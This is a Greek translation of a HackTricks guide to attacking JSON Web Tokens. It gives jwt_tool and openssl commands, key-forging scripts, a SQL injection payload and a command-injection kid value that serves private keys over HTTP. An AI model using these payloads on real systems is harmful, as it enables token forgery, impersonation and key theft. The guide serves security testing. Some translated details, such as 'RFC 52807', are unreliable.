30 KiB
Ευπάθειες JWT (Διαδικτυακά Κουτιά Json)
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Ερυθρού Συνεργείου HackTricks AWS)!
Άλλοι τρόποι υποστήριξης των HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας διαφημισμένη στα HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια στο GitHub.
Αν σας ενδιαφέρει η καριέρα στο χάκινγκ και να χακεύετε το αχακούρευτο - σας προσλαμβάνουμε! (απαιτείται άριστη γνώση γραπτού και προφορικού Πολωνικών).
{% embed url="https://www.stmcyber.com/careers" %}
Μέρος αυτής της ανάρτησης βασίζεται στην εξαιρετική ανάρτηση: https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
Συγγραφέας του εξαιρετικού εργαλείου για το pentest των JWTs https://github.com/ticarpi/jwt_tool
Γρήγορες Επιτυχίες
Εκτελέστε το jwt_tool με τη λειτουργία All Tests!
και περιμένετε για τις πράσινες γραμμές
python3 jwt_tool.py -M at \
-t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
-rh "Authorization: Bearer eyJhbG...<JWT Token>"
Εάν έχετε τύχη, το εργαλείο θα βρει κάποια περίπτωση όπου η web εφαρμογή ελέγχει εσφαλμένα το JWT:
Στη συνέχεια, μπορείτε να αναζητήσετε το αίτημα στον proxy σας ή να ανακτήσετε το χρησιμοποιημένο JWT για αυτό το αίτημα χρησιμοποιώντας το εργαλείο jwt_tool:
python3 jwt_tool.py -Q "jwttool_706649b802c9f5e41052062a3787b291"
Αλλοίωση δεδομένων χωρίς τροποποίηση τίποτα
Μπορείτε απλά να αλλοιώσετε τα δεδομένα αφήνοντας την υπογραφή ως έχει και να ελέγξετε αν ο διακομιστής ελέγχει την υπογραφή. Δοκιμάστε να αλλάξετε το όνομα χρήστη σε "admin" για παράδειγμα.
Ελέγχεται το τοκέν;
Για να ελέγξετε αν επαληθεύεται η υπογραφή ενός JWT:
- Ένα μήνυμα σφάλματος υποδηλώνει ενεργό έλεγχο· ευαίσθητες λεπτομέρειες σε λεπτομερείς σφάλματα πρέπει να εξεταστούν.
- Μια αλλαγή στην επιστρεφόμενη σελίδα υποδηλώνει επαλήθευση.
- Καμία αλλαγή υποδηλώνει ότι δεν υπάρχει επαλήθευση· αυτό είναι όταν πρέπει να πειραματιστείτε με την αλλοίωση των δηλώσεων φορτίου.
Προέλευση
Είναι σημαντικό να καθορίσετε εάν το τοκέν δημιουργήθηκε στην πλευρά του διακομιστή ή του πελάτη εξετάζοντας το ιστορικό αιτήσεων του διαμεσολαβητή.
- Τα τοκέν που πρωτοεμφανίζονται από την πλευρά του πελάτη υποδηλώνουν ότι η κλειδί μπορεί να είναι εκτεθειμένο στον κώδικα της πλευράς του πελάτη, απαιτώντας περαιτέρω έρευνα.
- Τα τοκέν που προέρχονται από την πλευρά του διακομιστή υποδηλώνουν ένα ασφαλές διαδικασία.
Διάρκεια
Ελέγξτε αν το τοκέν διαρκεί περισσότερο από 24 ώρες... ίσως να μην λήγει ποτέ. Αν υπάρχει πεδίο "exp", ελέγξτε αν ο διακομιστής χειρίζεται σωστά αυτό το πεδίο.
Επίθεση με βίαιη δύναμη στο μυστικό HMAC
Αλλαγή του αλγορίθμου σε None
Ορίστε τον χρησιμοποιούμενο αλγόριθμο ως "None" και αφαιρέστε το τμήμα της υπογραφής.
Χρησιμοποιήστε την επέκταση Burp με τίτλο "JSON Web Token" για να δοκιμάσετε αυτήν την ευπάθεια και να αλλάξετε διαφορετικές τιμές μέσα στο JWT (στείλτε το αίτημα στο Repeater και στην καρτέλα "JSON Web Token" μπορείτε να τροποποιήσετε τις τιμές του τοκέν. Μπορείτε επίσης να επιλέξετε να τοποθετήσετε την τιμή του πεδίου "Alg" σε "None").
Αλλαγή του αλγορίθμου από RS256 (ασύμμετρο) σε HS256 (συμμετρικό) (CVE-2016-5431/CVE-2016-10555)
Ο αλγόριθμος HS256 χρησιμοποιεί το μυστικό κλειδί για να υπογράψει και να επαληθεύσει κάθε μήνυμα.
Ο αλγόριθμος RS256 χρησιμοποιεί το ιδιωτικό κλειδί για να υπογράψει το μήνυμα και χρησιμοποιεί το δημόσιο κλειδί για την ταυτοποίηση.
Αν αλλάξετε τον αλγόριθμο από RS256 σε HS256, ο κώδικας πίσω από τον κώδικα χρησιμοποιεί το δημόσιο κλειδί ως μυστικό κλειδί και στη συνέχεια χρησιμοποιεί τον αλγόριθμο HS256 για να επαληθεύσει την υπογραφή.
Στη συνέχεια, χρησιμοποιώντας το δημόσιο κλειδί και αλλάζοντας το RS256 σε HS256 θα μπορούσαμε να δημιουργήσουμε μια έγκυρη υπογραφή. Μπορείτε να ανακτήσετε το πιστοποιητικό του διακομιστή εκτελώντας αυτό:
openssl s_client -connect example.com:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > certificatechain.pem #For this attack you can use the JOSEPH Burp extension. In the Repeater, select the JWS tab and select the Key confusion attack. Load the PEM, Update the request and send it. (This extension allows you to send the "non" algorithm attack also). It is also recommended to use the tool jwt_tool with the option 2 as the previous Burp Extension does not always works well.
openssl x509 -pubkey -in certificatechain.pem -noout > pubkey.pem
Νέο κλειδί δημόσιου κλειδιού μέσα στην κεφαλίδα
Ένας επιτιθέμενος ενσωματώνει ένα νέο κλειδί στην κεφαλίδα του τοκεν και ο διακομιστής χρησιμοποιεί αυτό το νέο κλειδί για την επαλήθευση της υπογραφής (CVE-2018-0114).
Αυτό μπορεί να γίνει με την επέκταση Burp "JSON Web Tokens".
(Στείλτε το αίτημα στο Repeater, εντός της καρτέλας JSON Web Token επιλέξτε "CVE-2018-0114" και στείλτε το αίτημα).
JWKS Παραπλάνηση
Οι οδηγίες περιγράφουν έναν τρόπο για να αξιολογήσετε την ασφάλεια των JWT τοκεν, ιδιαίτερα αυτών που χρησιμοποιούν έναν ισχυρισμό κεφαλίδας "jku". Αυτός ο ισχυρισμός θα πρέπει να συνδέεται με ένα αρχείο JWKS (JSON Web Key Set) που περιέχει το δημόσιο κλειδί που απαιτείται για την επαλήθευση του τοκεν.
- Αξιολόγηση Τοκεν με τον Ισχυρισμό "jku" Κεφαλίδας:
- Επαληθεύστε το URL του ισχυρισμού "jku" για να βεβαιωθείτε ότι οδηγεί στο κατάλληλο αρχείο JWKS.
- Τροποποιήστε την τιμή του "jku" του τοκεν για να κατευθύνετε προς έναν ελεγχόμενο διακομιστή ιστού, επιτρέποντας την παρατήρηση της κίνησης.
- Παρακολούθηση για Αλληλεπίδραση HTTP:
- Η παρακολούθηση των αιτήσεων HTTP προς το συγκεκριμένο URL υποδηλώνει τις προσπάθειες του διακομιστή να ανακτήσει κλειδιά από το παρεχόμενο σύνδεσμο.
- Κατά τη χρήση του
jwt_tool
για αυτήν τη διαδικασία, είναι ζωτικής σημασίας να ενημερώσετε το αρχείοjwtconf.ini
με την τοποθεσία του προσωπικού σας JWKS για να διευκολύνετε τον έλεγχο. - Εντολή για το
jwt_tool
: - Εκτελέστε την παρακάτω εντολή για να προσομοιώσετε το σενάριο με το
jwt_tool
:
python3 jwt_tool.py JWT_HERE -X s
Επισκόπηση Θεμάτων Kid
Ένας προαιρετικός ισχυρισμός κεφαλίδας γνωστός ως kid
χρησιμοποιείται για την αναγνώριση ενός συγκεκριμένου κλειδιού, το οποίο γίνεται ιδιαίτερα σημαντικό σε περιβάλλοντα όπου υπάρχουν πολλά κλειδιά για την επαλήθευση της υπογραφής του τοκεν. Αυτός ο ισχυρισμός βοηθά στην επιλογή του κατάλληλου κλειδιού για την επαλήθευση της υπογραφής ενός τοκεν.
Αποκάλυψη Κλειδιού μέσω του "kid"
Όταν ο ισχυρισμός kid
είναι παρών στην κεφαλίδα, συνιστάται να αναζητηθεί το αντίστοιχο αρχείο ή τις παραλλαγές του στον κατάλογο του ιστότοπου. Για παράδειγμα, εάν ορίζεται "kid":"key/12345"
, τα αρχεία /key/12345 και /key/12345.pem θα πρέπει να αναζητηθούν στη ρίζα του ιστού.
Διέλευση Διαδρομής με το "kid"
Ο ισχυρισμός kid
ενδέχεται επίσης να εκμεταλλευτείται για την πλοήγηση μέσω του συστήματος αρχείων, επιτρέποντας πιθανώς την επιλογή ενός αυθαίρετου αρχείου. Είναι εφικτό να δοκιμάσετε τη συνδεσιμότητα ή να εκτελέσετε επιθέσεις Server-Side Request Forgery (SSRF) αλλάζοντας την τιμή του kid
για να στοχεύσετε συγκεκριμένα αρχεία ή υπηρεσίες. Η παραβίαση του JWT για την αλλαγή της τιμής του kid
διατηρώντας την αρχική υπογραφή μπορεί να επιτευχθεί χρησιμοποιώντας τη σημαία -T
στο jwt_tool, όπως φαίνεται παρακάτω:
python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
Με στόχο τα αρχεία με προβλέψιμο περιεχόμενο, είναι δυνατή η πλαστογράφηση ενός έγκυρου JWT. Για παράδειγμα, το αρχείο /proc/sys/kernel/randomize_va_space
σε συστήματα Linux, γνωστό ότι περιέχει την τιμή 2, μπορεί να χρησιμοποιηθεί στην παράμετρο kid
με 2 ως το συμμετρικό κλειδί για τη δημιουργία JWT.
SQL Injection μέσω "kid"
Εάν το περιεχόμενο του διεκδικούμενου kid
χρησιμοποιείται για τη λήψη ενός κωδικού πρόσβασης από μια βάση δεδομένων, μπορεί να διευκολυνθεί μια επίθεση SQL injection με τροποποίηση του φορτίου του kid
. Ένα παράδειγμα φορτίου που χρησιμοποιεί SQL injection για να τροποποιήσει τη διαδικασία υπογραφής JWT περιλαμβάνει:
non-existent-index' UNION SELECT 'ATTACKER';-- -
Αυτή η τροποποίηση αναγκάζει τη χρήση ενός γνωστού μυστικού κλειδιού, ATTACKER
, για την υπογραφή JWT.
Εισχώρηση στο Λειτουργικό Σύστημα μέσω "kid"
Σε ένα σενάριο όπου η παράμετρος kid
καθορίζει ένα διαδρομή αρχείου που χρησιμοποιείται σε ένα πλαίσιο εκτέλεσης εντολών, μπορεί να οδηγήσει σε ευπάθειες Απομακρυσμένης Εκτέλεσης Κώδικα (RCE). Με την εισχώρηση εντολών στην παράμετρο kid
, είναι δυνατή η αποκάλυψη ιδιωτικών κλειδιών. Ένα παράδειγμα φορτίου για την επίτευξη RCE και αποκάλυψη κλειδιών είναι:
/root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&
x5u και jku
jku
Το jku σημαίνει JWK Set URL.
Εάν το τοκέν χρησιμοποιεί μια δήλωση "jku" Κεφαλίδας, τότε ελέγξτε την παρεχόμενη διεύθυνση URL. Αυτό θα πρέπει να δείχνει σε μια διεύθυνση URL που περιέχει το αρχείο JWKS που κρατά το Δημόσιο Κλειδί για τον έλεγχο του τοκέν. Αλλάξτε το τοκέν για να δείχνει η τιμή jku σε έναν ιστότοπο υπηρεσίας ιστού για τον οποίο μπορείτε να παρακολουθείτε την κίνηση.
Πρώτα πρέπει να δημιουργήσετε ένα νέο πιστοποιητικό με νέα ιδιωτικά και δημόσια κλειδιά
openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
Τότε μπορείτε να χρησιμοποιήσετε για παράδειγμα το jwt.io για να δημιουργήσετε το νέο JWT με τα δημιουργημένα δημόσια και ιδιωτικά κλειδιά και να δείξετε την παράμετρο jku στο πιστοποιητικό που δημιουργήθηκε. Για να δημιουργήσετε ένα έγκυρο πιστοποιητικό jku μπορείτε να κατεβάσετε το αρχικό και να αλλάξετε τις απαραίτητες παραμέτρους.
Μπορείτε να αποκτήσετε τις παραμέτρους "e" και "n" από ένα δημόσιο πιστοποιητικό χρησιμοποιώντας:
from Crypto.PublicKey import RSA
fp = open("publickey.crt", "r")
key = RSA.importKey(fp.read())
fp.close()
print("n:", hex(key.n))
print("e:", hex(key.e))
x5u
X.509 URL. Ένα URI που δείχνει σε ένα σύνολο δημόσιων πιστοποιητικών X.509 (ένα πρότυπο μορφοποίησης πιστοποιητικών) που κωδικοποιούνται σε μορφή PEM. Το πρώτο πιστοποιητικό στο σύνολο πρέπει να είναι αυτό που χρησιμοποιήθηκε για να υπογράψει αυτό το JWT. Τα επόμενα πιστοποιητικά υπογράφουν το προηγούμενο, ολοκληρώνοντας έτσι την αλυσίδα πιστοποιητικών. Το X.509 ορίζεται στο RFC 52807. Απαιτείται μεταφορά ασφάλειας για τη μεταφορά των πιστοποιητικών.
Προσπαθήστε να αλλάξετε αυτήν την κεφαλίδα σε ένα URL υπό τον έλεγχό σας και ελέγξτε εάν λαμβάνεται οποιοδήποτε αίτημα. Σε αυτήν την περίπτωση θα μπορούσατε να παραβιάσετε το JWT.
Για να πλασαρίσετε ένα νέο τοκεν χρησιμοποιώντας ένα πιστοποιητικό που ελέγχετε εσείς, πρέπει να δημιουργήσετε το πιστοποιητικό και να εξάγετε τα δημόσια και ιδιωτικά κλειδιά:
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -out attacker.crt
openssl x509 -pubkey -noout -in attacker.crt > publicKey.pem
Τότε μπορείτε να χρησιμοποιήσετε για παράδειγμα το jwt.io για να δημιουργήσετε το νέο JWT με τα δημιουργημένα δημόσια και ιδιωτικά κλειδιά και να δείχνετε την παράμετρο x5u στο πιστοποιητικό .crt που δημιουργήθηκε.
Μπορείτε επίσης να καταχραστείτε και τις δύο αυτές ευπάθειες για SSRFs.
x5c
Αυτή η παράμετρος μπορεί να περιέχει το πιστοποιητικό σε μορφή base64:
Αν ο επιτιθέμενος δημιουργήσει ένα αυτο-υπογεγραμμένο πιστοποιητικό και δημιουργήσει ένα πλαστό τοκέν χρησιμοποιώντας το αντίστοιχο ιδιωτικό κλειδί και αντικαταστήσει την τιμή της παραμέτρου "x5c" με το νεοδημιουργημένο πιστοποιητικό και τροποποιήσει τις άλλες παραμέτρους, δηλαδή n, e και x5t τότε ουσιαστικά το πλαστό τοκέν θα γίνει αποδεκτό από τον διακομιστή.
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -outattacker.crt
openssl x509 -in attacker.crt -text
Ενσωματωμένο Δημόσιο Κλειδί (CVE-2018-0114)
Αν το JWT έχει ενσωματωμένο ένα δημόσιο κλειδί όπως στο ακόλουθο σενάριο:
Χρησιμοποιώντας το ακόλουθο script nodejs είναι δυνατόν να δημιουργηθεί ένα δημόσιο κλειδί από αυτά τα δεδομένα:
const NodeRSA = require('node-rsa');
const fs = require('fs');
n ="ANQ3hoFoDxGQMhYOAc6CHmzz6_Z20hiP1Nvl1IN6phLwBj5gLei3e4e-DDmdwQ1zOueacCun0DkX1gMtTTX36jR8CnoBRBUTmNsQ7zaL3jIU4iXeYGuy7WPZ_TQEuAO1ogVQudn2zTXEiQeh-58tuPeTVpKmqZdS3Mpum3l72GHBbqggo_1h3cyvW4j3QM49YbV35aHV3WbwZJXPzWcDoEnCM4EwnqJiKeSpxvaClxQ5nQo3h2WdnV03C5WuLWaBNhDfC_HItdcaZ3pjImAjo4jkkej6mW3eXqtmDX39uZUyvwBzreMWh6uOu9W0DMdGBbfNNWcaR5tSZEGGj2divE8";
e = "AQAB";
const key = new NodeRSA();
var importedKey = key.importKey({n: Buffer.from(n, 'base64'),e: Buffer.from(e, 'base64'),}, 'components-public');
console.log(importedKey.exportKey("public"));
Είναι δυνατόν να δημιουργηθεί ένα νέο ιδιωτικό/δημόσιο κλειδί, να ενσωματωθεί το νέο δημόσιο κλειδί μέσα στο τοκέν και να χρησιμοποιηθεί για τη δημιουργία ενός νέου υπογραφής:
openssl genrsa -out keypair.pem 2048
openssl rsa -in keypair.pem -pubout -out publickey.crt
openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in keypair.pem -out pkcs8.key
Μπορείτε να λάβετε τα "n" και "e" χρησιμοποιώντας αυτό το σενάριο nodejs:
const NodeRSA = require('node-rsa');
const fs = require('fs');
keyPair = fs.readFileSync("keypair.pem");
const key = new NodeRSA(keyPair);
const publicComponents = key.exportKey('components-public');
console.log('Parameter n: ', publicComponents.n.toString("hex"));
console.log('Parameter e: ', publicComponents.e.toString(16));
ES256: Αποκάλυψη του ιδιωτικού κλειδιού με τον ίδιο αριθμό τυχαιότητας
Εάν κάποιες εφαρμογές χρησιμοποιούν τον αλγόριθμο ES256 και χρησιμοποιούν τον ίδιο αριθμό τυχαιότητας για τη δημιουργία δύο JWTs, το ιδιωτικό κλειδί μπορεί να ανακτηθεί.
Εδώ υπάρχει ένα παράδειγμα: ECDSA: Αποκάλυψη του ιδιωτικού κλειδιού, εάν χρησιμοποιείται ο ίδιος αριθμός τυχαιότητας (με SECP256k1)
JTI (JWT ID)
Η δήλωση JTI (JWT ID) παρέχει ένα μοναδικό αναγνωριστικό για ένα JWT Token. Μπορεί να χρησιμοποιηθεί για να αποτρέψει το token από το να επαναληφθεί.
Ωστόσο, φανταστείτε μια κατάσταση όπου το μέγιστο μήκος του ID είναι 4 (0001-9999). Οι αιτήσεις 0001 και 10001 θα χρησιμοποιήσουν το ίδιο ID. Έτσι, εάν ο server αυξάνει το ID σε κάθε αίτηση, μπορείτε να εκμεταλλευτείτε αυτό για επανάληψη μιας αίτησης (χρειάζεται να στείλετε 10000 αιτήσεις μεταξύ κάθε επιτυχούς επανάληψης).
Καταχωρημένες δηλώσεις JWT
{% embed url="https://www.iana.org/assignments/jwt/jwt.xhtml#claims" %}
Άλλες επιθέσεις
Επιθέσεις Διέλευσης Υπηρεσιών (Cross-service Relay Attacks)
Έχει παρατηρηθεί ότι μερικές web εφαρμογές βασίζονται σε μια αξιόπιστη υπηρεσία JWT για τη δημιουργία και διαχείριση των tokens τους. Έχουν καταγραφεί περιστατικά όπου ένα token, που δημιουργήθηκε για έναν πελάτη από την υπηρεσία JWT, γίνεται δεκτό από έναν άλλο πελάτη της ίδιας υπηρεσίας JWT. Εάν παρατηρηθεί η έκδοση ή ανανέωση ενός JWT μέσω μιας υπηρεσίας τρίτου, πρέπει να εξεταστεί η πιθανότητα εγγραφής σε έναν λογαριασμό σε έναν άλλο πελάτη της ϯυηρεσίας χρησιμοποιώντας το ίδιο όνομα χρήστη/email. Στη συνέχεια, πρέπει να γίνει μια προσπάθεια επανάληψης του ληφθέντος token σε μια αίτηση προς τον στόχο για να δούμε αν γίνεται δεκτό.
- Η αποδοχή του token σας μπορεί να υποδείξει ένα κρίσιμο θέμα, ενδεχομένως επιτρέποντας την πλαστογράφηση του λογαριασμού οποιουδήποτε χρήστη. Ωστόσο, πρέπει να σημειωθεί ότι ενδέχεται να απαιτηθεί άδεια για ευρύτερες δοκιμές εάν εγγραφείτε σε μια εφαρμογή τρίτου, καθώς αυτό μπορεί να εισέλθει σε μια νομική γκρι ζώνη.
Έλεγχος Λήξης των Tokens
Η λήξη του token ελέγχεται χρησιμοποιώντας τη δήλωση "exp" Payload. Δεδομένου ότι τα JWT συχνά χρησιμοποιούνται χωρίς πληροφορίες συνεδρίας, απαιτείται προσεκτική χειρισμός. Σε πολλές περιπτώσεις, η καταγραφή και επανάληψη ενός JWT ενός άλλου χρήστη θα μπορούσε να επιτρέψει την υποκατάσταση αυτού του χρήστη. Το RFC του JWT συνιστά τη μείωση των επιθέσεων επανάληψης JWT χρησιμοποιώντας τη δήλωση "exp" για να ορίσετε ένα χρόνο λήξης για το token. Επιπλέον, η υλοποίηση σχετικών ελέγχων από την εφαρμογή για να διασφαλίσει την επεξεργασία αυτής της τιμής και την απόρριψη των ληγμένων tokens είναι κρίσιμη. Εάν το token περιλαμβάνει μια δήλωση "exp" και οι χρονικοί περιορισμοί επιτρέπουν, συνιστάται να αποθηκεύσετε το token και να το επαναλάβετε μετά τη λήξη του χρόνου. Το περιεχόμενο του token, συμπεριλαμβανομένης της ανάλυσης της χρονικής σήμανσης και του ελέγχου λήξης (χρονική σήμανση σε UTC), μπορεί να διαβαστεί χρησιμοποιώντας τη σημαία -R του εργαλείου jwt_tool.
- Ένας κίνδυνος ασφαλείας μπορεί να υπάρχει εάν η εφαρμογή εξακολουθεί να επικυρώνει το token, καθώς αυτό μπορεί να σημαίνει ότι το token δεν μπορεί ποτέ να λήξει.
Εργαλεία
{% embed url="https://github.com/ticarpi/jwt_tool" %}
Εάν σας ενδιαφέρει η επαγγελματική ανάπτυξη και το χάκινγκ του αδύνατου - αναζητούμε προσωπικό! (απαιτείται άριστη γνώση της πολωνικής γλώσσας, τόσο γραπτά όσο και προφορικά).
{% embed url="https://www.stmcyber.com/careers" %}
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας διαφημισμένη στο HackTricks ή να κατεβάσετε το HackTricks σε PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα τηλεγραφήματος ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.